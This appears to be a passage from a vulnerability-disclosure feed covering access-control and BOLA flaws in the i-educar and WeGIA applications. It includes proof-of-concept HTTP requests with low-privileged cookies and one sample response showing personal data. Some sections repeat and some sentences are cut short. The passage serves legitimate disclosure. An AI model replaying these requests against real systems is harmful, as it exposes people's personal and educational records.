2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">GET /WeGIA/html/socio/sistema/get_relatorios_socios.php?tipo_socio=x&tipo_pessoa=x&operador=maior_q&valor=&tag=x&status=x HTTP/1.1 </span></span><span class="line"><span class="cl">Host: sec.wegia.org:8000 </span></span><span class="line"><span class="cl">User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0 </span></span><span class="line"><span class="cl">Accept: */* </span></span><span class="line"><span class="cl">Accept-Language: en-US,en;q=0.5 </span></span><span class="line"><span class="cl">Accept-Encoding: gzip, deflate, br, zstd </span></span><span class="line"><span class="cl">X-Requested-With: XMLHttpRequest </span></span><span class="line"><span class="cl">Connection: keep-alive </span></span><span class="line"><span class="cl">Referer: https://sec.wegia.org:8000/WeGIA/html/socio/sistema/relatorios_socios.php </span></span><span class="line"><span class="cl">Cookie: _ga_F8DXBXLV8J=GS2.1.s1756605228$o47$g1$t1756611307$j47$l0$h0; _ga=GA1.1.424189364.1749063834 </span></span><span class="line"><span class="cl">Sec-Fetch-Dest: empty </span></span><span class="line"><span class="cl">Sec-Fetch-Mode: cors </span></span><span class="line"><span class="cl">Sec-Fetch-Site: same-origin </span></span><span class="line"><span class="cl">Priority: u=0 </span></span></code></pre></td></tr></table> </div> </div><h3 id="response-snippet">Response (snippet): </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">HTTP/1.1 200 OK </span></span><span class="line"><span class="cl">Date: Sun, 31 Aug 2025 20:00:43 GMT </span></span><span class="line"><span class="cl">Server: Apache/2.4.62 (Debian) </span></span><span class="line"><span class="cl">Vary: Accept-Encoding </span></span><span class="line"><span class="cl">Content-Length: 204 </span></span><span class="line"><span class="cl">Keep-Alive: timeout=5, max=100 </span></span><span class="line"><span class="cl">Connection: Keep-Alive </span></span><span class="line"><span class="cl">Content-Type: text/html; charset=UTF-8 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">[{ </span></span><span class="line"><span class="cl"> "nome": "Luis Barango", </span></span><span class="line"><span class="cl"> "telefone": "(71)98642-1278", </span></span><span class="line"><span class="cl"> "cpf": "649.659.320-56", </span></span><span class="line"><span class="cl"> "valor_periodo": "5000.00", </span></span><span class="line"><span class="cl"> "email": "teste@teste.com", </span></span><span class="line"><span class="cl"> "tipo": "F\u00edsica - Mensal - Boleto", </span></span><span class="line"><span class="cl"> "status": "Ativo", </span></span><span class="line"><span class="cl"> "tag": "Solicitante" </span></span><span class="line"><span class="cl">}] </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-61665/image.png" width="1534" height="431" srcset="/p/cve-2025-61665/image_hu_14ad2691788bd7c6.png 480w, /p/cve-2025-61665/image_hu_16f20d6fda007cbd.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="355" data-flex-basis="854px" /></p> <h2 id="impact">Impact </h2><p style="text-align: justify;">Broken Access Control vulnerabilities can have severe consequences, including: <ul> <li>Unauthorized access to restricted functionality;</li> <li>Escalation of privileges for low-level users;</li> <li>Exposure of sensitive data and potential system compromise;</li> <li>Loss of confidentiality and integrity of educational records;</li> <li>Reputational damage to the organization.</li> </ul> </p> <h2 id="reference">Reference </h2><p><em><strong><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-62wp-6qmh-6p5f" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-62wp-6qmh-6p5f</a></strong></em></p> <h2 id="finder">Finder </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Tue, 30 Sep 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-11049/ https://www.cvehunters.com/p/cve-2025-11049/ <h2 id="cve-2025-11049-broken-access-control-in-unificacao-aluno-endpoint">CVE-2025-11049: Broken Access Control in <code>/unificacao-aluno</code> Endpoint </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-11049" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-11049</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Broken Access Control vulnerability was identified in the <code>/unificacao-aluno</code> endpoint of the i-educar application. This vulnerability allows users without proper permissions to access restricted functionality, bypassing authorization checks.</p> <h2 id="details">Details </h2><p style="text-align: justify;"><b>Vulnerable Endpoint:</b> <code>GET /unificacao-aluno</code></br><b>Authentication:</b> Required</br></br>The application fails to properly validate user permissions before granting access to this endpoint. As a result, even low-privileged users can successfully access the functionality intended only for .</p><h2 id="cve-2025-11049-broken-access-control-in-unificacao-aluno-endpoint">CVE-2025-11049: Broken Access Control in <code>/unificacao-aluno</code> Endpoint </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-11049" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-11049</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Broken Access Control vulnerability was identified in the <code>/unificacao-aluno</code> endpoint of the i-educar application. This vulnerability allows users without proper permissions to access restricted functionality, bypassing authorization checks.</p> <h2 id="details">Details </h2><p style="text-align: justify;"><b>Vulnerable Endpoint:</b> <code>GET /unificacao-aluno</code></br><b>Authentication:</b> Required</br></br>The application fails to properly validate user permissions before granting access to this endpoint. As a result, even low-privileged users can successfully access the functionality intended only for .</p> <h2 id="poc">PoC </h2><p style="text-align: justify;"><ul><li>Authenticate as a non-privileged user.</li></ul></p> <p><img src="/p/cve-2025-11049/image.png" width="1603" height="673" srcset="/p/cve-2025-11049/image_hu_d7804f71d4cae366.png 480w, /p/cve-2025-11049/image_hu_7e1e16197ca84d77.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="238" data-flex-basis="571px" /></p> <p><img src="/p/cve-2025-11049/image-1.png" width="936" height="436" srcset="/p/cve-2025-11049/image-1_hu_8cd5643a33eabd47.png 480w, /p/cve-2025-11049/image-1_hu_f205df0666d7bd3a.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="214" data-flex-basis="515px" /></p> <p style="text-align: justify;"><ul><li>Send the following request:</li></ul></p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl">GET /unificacao-aluno HTTP/1.1 </span></span><span class="line"><span class="cl">Host: localhost </span></span><span class="line"><span class="cl">User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0 </span></span><span class="line"><span class="cl">Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 </span></span><span class="line"><span class="cl">Accept-Language: en-US,en;q=0.5 </span></span><span class="line"><span class="cl">Accept-Encoding: gzip, deflate, br, zstd </span></span><span class="line"><span class="cl">Connection: keep-alive </span></span><span class="line"><span class="cl">Referer: http://localhost/intranet/educar_consulta_movimento_mensal_lst.php?ano=2025<span class="err">&</span>ref_cod_instituicao=1<span class="err">&</span>ref_cod_escola=4<span class="err">&</span>ref_cod_curso=3<span class="err">&</span>ref_cod_serie=<span class="err">&</span>ref_cod_turma=<span class="err">&</span>data_inicial=01%2F08%2F2025<span class="err">&</span>data_final=31%2F08%2F2025<span class="err">&</span>modalidade=1 </span></span><span class="line"><span class="cl">Cookie: i_educar_session=[low_privileged cookie] </span></span><span class="line"><span class="cl">Upgrade-Insecure-Requests: 1 </span></span><span class="line"><span class="cl">Sec-Fetch-Dest: document </span></span><span class="line"><span class="cl">Sec-Fetch-Mode: navigate </span></span><span class="line"><span class="cl">Sec-Fetch-Site: same-origin </span></span><span class="line"><span class="cl">Sec-Fetch-User: ?1 </span></span><span class="line"><span class="cl">Priority: u=0, i </span></span></code></pre></td></tr></table> </div> </div><p style="text-align: justify;"><ul><li>We could observe that we have access to the page and to the function. And, this user, should not do that.</li></ul></p> <p><img src="/p/cve-2025-11049/image-2.png" width="1585" height="666" srcset="/p/cve-2025-11049/image-2_hu_65700f12f8b3e361.png 480w, /p/cve-2025-11049/image-2_hu_385fd793852dde6.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="237" data-flex-basis="571px" /></p> <h2 id="impact">Impact </h2><p style="text-align: justify;">Broken Access Control vulnerabilities can have severe consequences, including: <ul> <li>Unauthorized access to restricted functionality;</li> <li>Escalation of privileges for low-level users;</li> <li>Exposure of sensitive data and potential system compromise;</li> <li>Loss of confidentiality and integrity of educational records;</li> <li>Reputational damage to the organization.</li> </ul> </p> <h2 id="reference">Reference </h2><p><em><strong><a class="link" href="https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-11049.md" target="_blank" rel="noopener" >https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-11049.md</a></strong></em></p> <h2 id="finder">Finder </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Sat, 27 Sep 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-11050/ https://www.cvehunters.com/p/cve-2025-11050/ <h2 id="cve-2025-11050-broken-access-control-in-periodo-lancamento-endpoint">CVE-2025-11050: Broken Access Control in <code>/periodo-lancamento</code> Endpoint </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-11050" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-11050</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Broken Access Control vulnerability was identified in the <code>/periodo-lancamento</code> endpoint of the i-educar application. This vulnerability allows users without proper permissions to access restricted functionality, bypassing authorization checks.</p> <h2 id="details">Details </h2><p style="text-align: justify;"><b>Vulnerable Endpoint:</b> <code>GET /periodo-lancamento</code></br><b>Authentication:</b> Required</br></br>The application fails to properly validate user permissions before granting access to this endpoint. As a result, even low-privileged users can successfully access the functionality intended only for .</p><h2 id="cve-2025-11050-broken-access-control-in-periodo-lancamento-endpoint">CVE-2025-11050: Broken Access Control in <code>/periodo-lancamento</code> Endpoint </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-11050" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-11050</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Broken Access Control vulnerability was identified in the <code>/periodo-lancamento</code> endpoint of the i-educar application. This vulnerability allows users without proper permissions to access restricted functionality, bypassing authorization checks.</p> <h2 id="details">Details </h2><p style="text-align: justify;"><b>Vulnerable Endpoint:</b> <code>GET /periodo-lancamento</code></br><b>Authentication:</b> Required</br></br>The application fails to properly validate user permissions before granting access to this endpoint. As a result, even low-privileged users can successfully access the functionality intended only for .</p> <h2 id="poc">PoC </h2><p style="text-align: justify;"><ul><li>Authenticate as a non-privileged user.</li></ul></p> <p><img src="/p/cve-2025-11050/image.png" width="1603" height="673" srcset="/p/cve-2025-11050/image_hu_d7804f71d4cae366.png 480w, /p/cve-2025-11050/image_hu_7e1e16197ca84d77.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="238" data-flex-basis="571px" /></p> <p><img src="/p/cve-2025-11050/image-1.png" width="936" height="436" srcset="/p/cve-2025-11050/image-1_hu_8cd5643a33eabd47.png 480w, /p/cve-2025-11050/image-1_hu_f205df0666d7bd3a.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="214" data-flex-basis="515px" /></p> <p style="text-align: justify;"><ul><li>Send the following request:</li></ul></p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl">GET /periodo-lancamento HTTP/1.1 </span></span><span class="line"><span class="cl">Host: localhost </span></span><span class="line"><span class="cl">User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0 </span></span><span class="line"><span class="cl">Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 </span></span><span class="line"><span class="cl">Accept-Language: en-US,en;q=0.5 </span></span><span class="line"><span class="cl">Accept-Encoding: gzip, deflate, br, zstd </span></span><span class="line"><span class="cl">Connection: keep-alive </span></span><span class="line"><span class="cl">Cookie: i_educar_session=[low_privileged cookie] </span></span><span class="line"><span class="cl">Upgrade-Insecure-Requests: 1 </span></span><span class="line"><span class="cl">Sec-Fetch-Dest: document </span></span><span class="line"><span class="cl">Sec-Fetch-Mode: navigate </span></span><span class="line"><span class="cl">Sec-Fetch-Site: none </span></span><span class="line"><span class="cl">Sec-Fetch-User: ?1 </span></span><span class="line"><span class="cl">Priority: u=0, i </span></span></code></pre></td></tr></table> </div> </div><p style="text-align: justify;"><ul><li>We could observe that we have access to the page and to the function. And, this user, should not do that.</li></ul></p> <p><img src="/p/cve-2025-11050/image-2.png" width="967" height="657" srcset="/p/cve-2025-11050/image-2_hu_c45211c19b719ad8.png 480w, /p/cve-2025-11050/image-2_hu_b631283a84602958.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="147" data-flex-basis="353px" /></p> <h2 id="impact">Impact </h2><p style="text-align: justify;">Broken Access Control vulnerabilities can have severe consequences, including: <ul> <li>Unauthorized access to restricted functionality;</li> <li>Escalation of privileges for low-level users;</li> <li>Exposure of sensitive data and potential system compromise;</li> <li>Loss of confidentiality and integrity of educational records;</li> <li>Reputational damage to the organization.</li> </ul> </p> <h2 id="reference">Reference </h2><p><em><strong><a class="link" href="https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-11050.md" target="_blank" rel="noopener" >https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-11050.md</a></strong></em></p> <h2 id="finder">Finder </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Sat, 27 Sep 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-11047/ https://www.cvehunters.com/p/cve-2025-11047/ <h2 id="cve-2025-11047-broken-object-level-authorization-bola-allows-enumeration-of-student-records-via-moduleapialuno">CVE-2025-11047: Broken Object Level Authorization (BOLA) allows enumeration of student records via <code>/module/Api/aluno</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-11047" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-11047</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Broken Object Level Authorization (BOLA) vulnerability was identified in the <code>/module/Api/aluno</code> endpoint of the i-Educar application.This flaw allows a user without proper permissions to query the endpoint and retrieve ** class information** by manipulating request parameters.</br></br>This flaw allows low-privileged users (e.g., standard student/responsible accounts) to retrieve enrollment (<b>matriculas</b>) information of students outside their scope, exposing Personally Identifiable Information (PII) without proper authorization checks.</p><h2 id="cve-2025-11047-broken-object-level-authorization-bola-allows-enumeration-of-student-records-via-moduleapialuno">CVE-2025-11047: Broken Object Level Authorization (BOLA) allows enumeration of student records via <code>/module/Api/aluno</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-11047" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-11047</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Broken Object Level Authorization (BOLA) vulnerability was identified in the <code>/module/Api/aluno</code> endpoint of the i-Educar application.This flaw allows a user without proper permissions to query the endpoint and retrieve ** class information** by manipulating request parameters.</br></br>This flaw allows low-privileged users (e.g., standard student/responsible accounts) to retrieve enrollment (<b>matriculas</b>) information of students outside their scope, exposing Personally Identifiable Information (PII) without proper authorization checks.</p> <h2 id="details">Details </h2><p style="text-align: justify;"><b>Vulnerable Endpoint:</b> <code>GET /module/Api/aluno</code></br></br>The application fails to enforce <b>object-level authorization</b>when handling this endpoint. As a result, any authenticated user can manipulate the request values to access sensitive information (names, IDs, enrollment status) of students.</p> <p style="text-align: justify;"><b>Expected behavior:</b><ul><li>Only authorized roles (e.g., administrators, coordinators, teachers linked to the class) should be able to access this data.</li><li>Unauthorized users should receive 403 Forbidden or an empty response.</li></ul></p> <p style="text-align: justify;"><b>Observed behavior:</br></b><ul><li>Any authenticated user (even low-privilege accounts) can access this endpoint and retrieve sensitive information about academic classes.</li></ul></p> <h2 id="poc">PoC </h2><p style="text-align: justify;"><ul><li>Authenticate as a non-privileged user (e.g., student, professor).</li></ul></p> <p><img src="/p/cve-2025-11047/image.png" width="1380" height="528" srcset="/p/cve-2025-11047/image_hu_e9ed6b29581f01dc.png 480w, /p/cve-2025-11047/image_hu_374181a535d27950.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="261" data-flex-basis="627px" /></p> <p><img src="/p/cve-2025-11047/image-1.png" width="846" height="616" srcset="/p/cve-2025-11047/image-1_hu_29ac0d2382b460d0.png 480w, /p/cve-2025-11047/image-1_hu_5d2f89eaf0785474.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="137" data-flex-basis="329px" /></p> <p style="text-align: justify;"><ul><li>Send the following request:</li></ul></p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">GET /module/Api/aluno?&oper=get&resource=matriculas&aluno_id=206 HTTP/1.1 </span></span><span class="line"><span class="cl">Host: localhost </span></span><span class="line"><span class="cl">User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0 </span></span><span class="line"><span class="cl">Accept: application/json, text/javascript, */*; q=0.01 </span></span><span class="line"><span class="cl">Accept-Language: en-US,en;q=0.5 </span></span><span class="line"><span class="cl">Accept-Encoding: gzip, deflate, br, zstd </span></span><span class="line"><span class="cl">X-Requested-With: XMLHttpRequest </span></span><span class="line"><span class="cl">Connection: keep-alive </span></span><span class="line"><span class="cl">Referer: http://localhost/intranet/educar_aluno_det.php?cod_aluno=206 </span></span><span class="line"><span class="cl">Cookie: i_educar_session=[LOW PRIVILEGED COOKIE] </span></span><span class="line"><span class="cl">Sec-Fetch-Dest: empty </span></span><span class="line"><span class="cl">Sec-Fetch-Mode: cors </span></span><span class="line"><span class="cl">Sec-Fetch-Site: same-origin </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-11047/image-2.png" width="1345" height="676" srcset="/p/cve-2025-11047/image-2_hu_b56dab6489bf9ba8.png 480w, /p/cve-2025-11047/image-2_hu_146b18df03b3e320.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="198" data-flex-basis="477px" /></p> <p style="text-align: justify;"><ul><li>We could observe that informations about classes were returned.</li></ul></p> <h2 id="impact">Impact </h2><p style="text-align: justify;">This vulnerability is a Broken Object Level Authorization (BOLA) issue (OWASP API Top 10 - 2023, A01), allowing sensitive data exposure. Any authenticated user can access personal information of other users. This can lead to: <ul> <li>Unauthorized access to sensitive PII;</li> <li>Violation of data protection laws (e.g., LGPD, GDPR);</li> <li>Potential abuse of user data or impersonation;</li> <li>User enumeration.</li> </ul> </p> <h2 id="reference">Reference </h2><p><em><strong><a class="link" href="https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-11047.md" target="_blank" rel="noopener" >https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-11047.md</a></strong></em></p> <h2 id="finder">Finder </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Fri, 26 Sep 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-11048/ https://www.cvehunters.com/p/cve-2025-11048/ <h2 id="cve-2025-11048-broken-access-control-in-consulta-dispensas-endpoint">CVE-2025-11048: Broken Access Control in <code>/consulta-dispensas</code> Endpoint </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-11048" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-11048</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Broken Access Control vulnerability was identified in the <code>/consulta-dispensas</code> endpoint of the i-educar application. This vulnerability allows users without proper permissions to access restricted functionality, bypassing authorization checks.</p> <h2 id="details">Details </h2><p style="text-align: justify;"><b>Vulnerable Endpoint:</b> <code>GET /consulta-dispensas</code></br><b>Authentication:</b> Required</br></br>The application fails to properly validate user permissions before granting access to this endpoint. As a result, even low-privileged users can successfully access the functionality intended only for .</p><h2 id="cve-2025-11048-broken-access-control-in-consulta-dispensas-endpoint">CVE-2025-11048: Broken Access Control in <code>/consulta-dispensas</code> Endpoint </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-11048" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-11048</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Broken Access Control vulnerability was identified in the <code>/consulta-dispensas</code> endpoint of the i-educar application. This vulnerability allows users without proper permissions to access restricted functionality, bypassing authorization checks.</p> <h2 id="details">Details </h2><p style="text-align: justify;"><b>Vulnerable Endpoint:</b> <code>GET /consulta-dispensas</code></br><b>Authentication:</b> Required</br></br>The application fails to properly validate user permissions before granting access to this endpoint. As a result, even low-privileged users can successfully access the functionality intended only for .</p> <h2 id="poc">PoC </h2><p style="text-align: justify;"><ul><li>Authenticate as a non-privileged user.</li></ul></p> <p><img src="/p/cve-2025-11048/image.png" width="1603" height="673" srcset="/p/cve-2025-11048/image_hu_d7804f71d4cae366.png 480w, /p/cve-2025-11048/image_hu_7e1e16197ca84d77.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="238" data-flex-basis="571px" /></p> <p><img src="/p/cve-2025-11048/image-1.png" width="936" height="436" srcset="/p/cve-2025-11048/image-1_hu_8cd5643a33eabd47.png 480w, /p/cve-2025-11048/image-1_hu_f205df0666d7bd3a.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="214" data-flex-basis="515px" /></p> <p style="text-align: justify;"><ul><li>Send the following request:</li></ul></p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl">GET /consulta-dispensas HTTP/1.1 </span></span><span class="line"><span class="cl">Host: localhost </span></span><span class="line"><span class="cl">User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0 </span></span><span class="line"><span class="cl">Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 </span></span><span class="line"><span class="cl">Accept-Language: en-US,en;q=0.5 </span></span><span class="line"><span class="cl">Accept-Encoding: gzip, deflate, br, zstd </span></span><span class="line"><span class="cl">Connection: keep-alive </span></span><span class="line"><span class="cl">Cookie: i_educar_session=[low_privileged cookie] </span></span><span class="line"><span class="cl">Upgrade-Insecure-Requests: 1 </span></span><span class="line"><span class="cl">Sec-Fetch-Dest: document </span></span><span class="line"><span class="cl">Sec-Fetch-Mode: navigate </span></span><span class="line"><span class="cl">Sec-Fetch-Site: none </span></span><span class="line"><span class="cl">Sec-Fetch-User: ?1 </span></span><span class="line"><span class="cl">Priority: u=0, i </span></span></code></pre></td></tr></table> </div> </div><p style="text-align: justify;"><ul><li>We could observe that we have access to the page and to the function. And, this user, should not do that.</li></ul></p> <p><img src="/p/cve-2025-11048/image-2.png" width="960" height="816" srcset="/p/cve-2025-11048/image-2_hu_c031b0a968dc8a1c.png 480w, /p/cve-2025-11048/image-2_hu_d30391eb81b5ae23.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="117" data-flex-basis="282px" /></p> <h2 id="impact">Impact </h2><p style="text-align: justify;">Broken Access Control vulnerabilities can have severe consequences, including: <ul> <li>Unauthorized access to restricted functionality;</li> <li>Escalation of privileges for low-level users;</li> <li>Exposure of sensitive data and potential system compromise;</li> <li>Loss of confidentiality and integrity of educational records;</li> <li>Reputational damage to the organization.</li> </ul> </p> <h2 id="reference">Reference </h2><p><em><strong><a class="link" href="https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-11048.md" target="_blank" rel="noopener" >https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-11048.md</a></strong></em></p> <h2 id="finder">Finder </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Fri, 26 Sep 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-10909/ https://www.cvehunters.com/p/cve-2025-10909/ <h2 id="cve-2025-10909-multiples-stored-cross-site-scripting-xss-injection-via-svg-file-upload-bypass">CVE-2025-10909: Multiples Stored Cross-Site Scripting (XSS) Injection via SVG File Upload Bypass </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-10909" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-10909</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p align="justify">Multiples Stored Cross-Site Scripting (XSS) via SVG File Upload Bypass vulnerability was identified in the <code>/admin</code> endpoint of the NovoSGA 